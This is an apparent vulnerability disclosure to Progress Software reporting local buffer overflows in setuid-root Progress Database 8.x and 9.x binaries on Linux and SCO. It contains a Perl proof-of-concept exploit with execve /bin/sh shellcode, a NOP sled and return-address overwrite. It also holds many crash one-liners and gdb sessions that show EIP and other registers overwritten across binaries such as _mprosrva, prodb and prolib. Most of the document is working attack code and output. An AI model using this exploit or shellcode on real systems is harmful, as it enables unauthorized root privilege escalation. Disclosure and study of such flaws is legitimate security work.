progress-db.txt

`Vendor: www.progress.com  
Issue: Local overflows Progress Database server 8.x and 9.x Unix (Linux and  
SCO and others?)  
Nt versions MAY not be affected (tested versions 7, 8 and 9)  
  
Several overflows are present in your software ... if I can overwrite the  
eip on the stack I can run arbitrary code as root via your program ... thus  
circumventing my user privledges to gain root. My test exploit is attached  
below (a work in progress)along with examples of gdb out put and the  
programs crashes  
  
  
#!/usr/bin/perl  
# Progress 8 and 9 test exploit code  
# Proof of concept by [email protected]  
  
$len = 481; # Sufficient to overwrite the return value.  
$nop = "\x90";  
$ret = 0xbfffe208; # Return Value / ESP / Stack Pointer.  
  
$shellcode=  
"\x89\xe6".  
"\x83\xc6\x30".  
"\xb8\x2e\x62\x69\x6e".  
"\x40".  
"\x89\x06".  
"\xb8\x2e\x73\x68\x21".  
"\x40".  
"\x89\x46\x04".  
"\x29\xc0".  
"\x88\x46\x07".  
"\x89\x76\x08".  
"\x89\x46\x0c".  
"\xb0\x0b".  
"\x87\xf3".  
"\x8d\x4b\x08".  
"\x8d\x53\x0c".  
"\xcd\x80";  
  
  
if (@ARGV < 1) {  
print("Usage: $0 <offset>\n");  
exit(1);  
}  
  
( $offset) = @ARGV;  
  
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {  
$buffer .= $nop;  
}  
  
$buffer .= $shellcode;  
$new_ret = pack('l', ($ret + $offset));  
  
$address = sprintf('%lx', ($ret + $offset));  
  
for ($i += length($shellcode); $i < $len; $i += 4) {  
$buffer .= $new_ret;  
}  
  
$exploit_string = "a $buffer";  
  
system("echo -e \"$exploit_string\"");  
  
----------------------------------------------  
  
# gdb /usr/dlc/bin/_mpros core  
Core was generated by `/usr/dlc/bin/_mprosrva  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
Reading symbols from /lib/libm.so.6...done.  
Loaded symbols for /lib/libm.so.6  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
#0 0x42424242 in ?? ()  
(gdb) q  
[root@localhost /root]# /usr/dlc/bin/_mprosrva `perl -e 'print "A" x 5746'  
`BBBB  
BBBB == 0x42424242 or my eip  
  
buffer is 1143 chars to begin overwrite eax 5746 to overwrite eip  
  
(gdb) info registers  
eax 0x80b3c80 134954112  
ecx 0xbffff4f4 -1073744652  
edx 0x480b5e31 1208704561  
ebx 0x1 1  
esp 0xbfffdbc0 0xbfffdbc0  
ebp 0xbfffdbe0 0xbfffdbe0  
esi 0x2 2  
edi 0xbfffdcf4 -1073750796  
eip 0x42424242 0x42424242  
eflags 0x10206 66054  
cs 0x23 35  
ss 0x2b 43  
ds 0x2b 43  
es 0x2b 43  
fs 0x2b 43  
gs 0x2b 43  
fctrl 0x0 0  
fstat 0x0 0  
ftag 0x0 0  
fiseg 0x0 0  
fioff 0x0 0  
foseg 0x0 0  
fooff 0x0 0  
fop 0x0 0  
  
  
below are Several more examples  
  
# uname -a  
SCO_SV scosysv 3.2 5.0.5 i386  
# ls -al /usr/dlc/bin/proserve  
-rwxr-xr-x 1 root sys 2708 Jan 9 15:29 /usr/dlc/bin/proserve  
# /usr/dlc/bin/proserve `perl -e 'print "A" x 3000'`  
PROGRESS Version 9.1B as of Sun Dec 3 20:27:14 EST 2000  
Memory fault - core dumped  
#  
  
------------------  
  
/usr/dlc/bin/_mprshut `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
-----------------------------------  
  
/usr/dlc/bin/_mprosrv `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
-------------------  
  
/usr/dlc/bin/_probuild a `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
--------------------  
  
/usr/dlc/bin/prodb a `perl -e 'print "A" x 2000'`  
Memory fault - core dumped  
  
  
below this line is all version 8.3b  
  
-rwsrwxr-x 1 root root 508151 Nov 10 1999  
/usr/dlc/bin/_dbutil*  
-rwsrwxr-x 1 root root 557075 Nov 10 1999  
/usr/dlc/bin/_mprosrv*  
-rwsrwxr-x 1 root root 561294 Nov 10 1999  
/usr/dlc/bin/_mprosrva*  
-rwsrwxr-x 1 root root 604635 Nov 10 1999  
/usr/dlc/bin/_mprshut*  
-rwsrwxr-x 1 root root 2574331 Nov 10 1999  
/usr/dlc/bin/_probuild*  
-rwsrwxr-x 1 root root 2986163 Nov 10 1999  
/usr/dlc/bin/_progres*  
-rwsrwxr-x 1 root root 2924760 Nov 10 1999  
/usr/dlc/bin/_progresa*  
-rwsrwxr-x 1 root root 971209 Nov 10 1999  
/usr/dlc/bin/_proutil*  
-rwsrwxr-x 1 root root 686582 Nov 10 1999  
/usr/dlc/bin/_rfutil*  
-rwsrwxr-x 1 root root 122260 Nov 10 1999 /usr/dlc/bin/prodb*  
-rwsrwxr-x 1 root root 134337 Nov 10 1999  
/usr/dlc/bin/prolib*  
  
[root@localhost /root]# /usr/dlc/bin/prolib library-name `perl -e 'print  
"A" x 2000'`  
Invalid prolib command  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/prolib core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/prolib library-name  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
Reading symbols from /lib/libm.so.6...done.  
Loaded symbols for /lib/libm.so.6  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
Reading symbols from /lib/libnss_files.so.2...done.  
Loaded symbols for /lib/libnss_files.so.2  
#0 0x41414141 in ?? ()  
  
---------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_probuild sports `perl -e 'print "A" x  
1200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_probuild core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_probuild sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x400905c7 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
(gdb)  
  
  
---------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_progres sports `perl -e 'print "A" x  
1200'`  
Segmentation fault (core dumped)  
  
[root@localhost /root]# gdb /usr/dlc/bin/_progres core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_progres sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x400905c7 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
(gdb)  
  
------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_progresa sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_progresa core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_progresa sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
--------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_dbutil prorest sports `perl -e 'print  
"A"  
x 4200'`  
** Cannot find or open file  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)#w:)  
#w:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
SYSTEM ERROR: Memory violation. (49)  
** Save file named core for analysis by Progress Software Corporation.  
(439)  
Quit (core dumped)  
  
  
[root@localhost /root]# gdb /usr/dlc/bin/_dbutil core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_dbutil prorest sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 3, Quit.  
Reading symbols from /lib/libm.so.6...done.  
Loaded symbols for /lib/libm.so.6  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
Reading symbols from /lib/libnss_files.so.2...done.  
Loaded symbols for /lib/libnss_files.so.2  
#0 0x400590d1 in kill () from /lib/libc.so.6  
(gdb) info register edi  
edi 0x41414141 1094795585  
  
  
-----------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_proutil sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_proutil core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_proutil sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
-------------------------------------------------------------  
[root@localhost /root]# /usr/dlc/bin/_rfutil sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_rfutil core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_rfutil sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x400905ad in ?? ()  
  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
--------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/prodb sports `perl -e 'print "A" x  
4200'`  
  
The database name is too long.  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/prodb core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAA/.db.bi.tl.lg.lk  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
Reading symbols from /lib/libc.so.6...done.  
Loaded symbols for /lib/libc.so.6  
Reading symbols from /lib/ld-linux.so.2...done.  
Loaded symbols for /lib/ld-linux.so.2  
#0 0x41414141 in ?? ()  
  
(gdb) info register eip  
eip 0x41414141 0x41414141  
  
  
-----------------------------------------------------------------  
[root@localhost /root]# /usr/dlc/bin/_mprosrv sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrv core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_mprosrv sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
------------------------------------------------------------------  
  
[root@localhost /root]# /usr/dlc/bin/_mprosrva sports `perl -e 'print "A"  
x 4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrva core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_mprosrva sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
  
---------------------------------------------------------------  
[root@localhost /root]# /usr/dlc/bin/_mprshut sports `perl -e 'print "A" x  
4200'`  
Segmentation fault (core dumped)  
[root@localhost /root]# gdb /usr/dlc/bin/_mprshut core  
GNU gdb 5.0  
Copyright 2000 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you  
are  
welcome to change it and/or distribute copies of it under certain  
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i586-mandrake-linux"...  
Core was generated by `/usr/dlc/bin/_mprshut sports  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.  
Program terminated with signal 11, Segmentation fault.  
#0 0x40090590 in ?? ()  
(gdb) info register eax  
eax 0x41414141 1094795585  
(gdb)  
  
------------------------------------------------------------------------  
  
  
  
`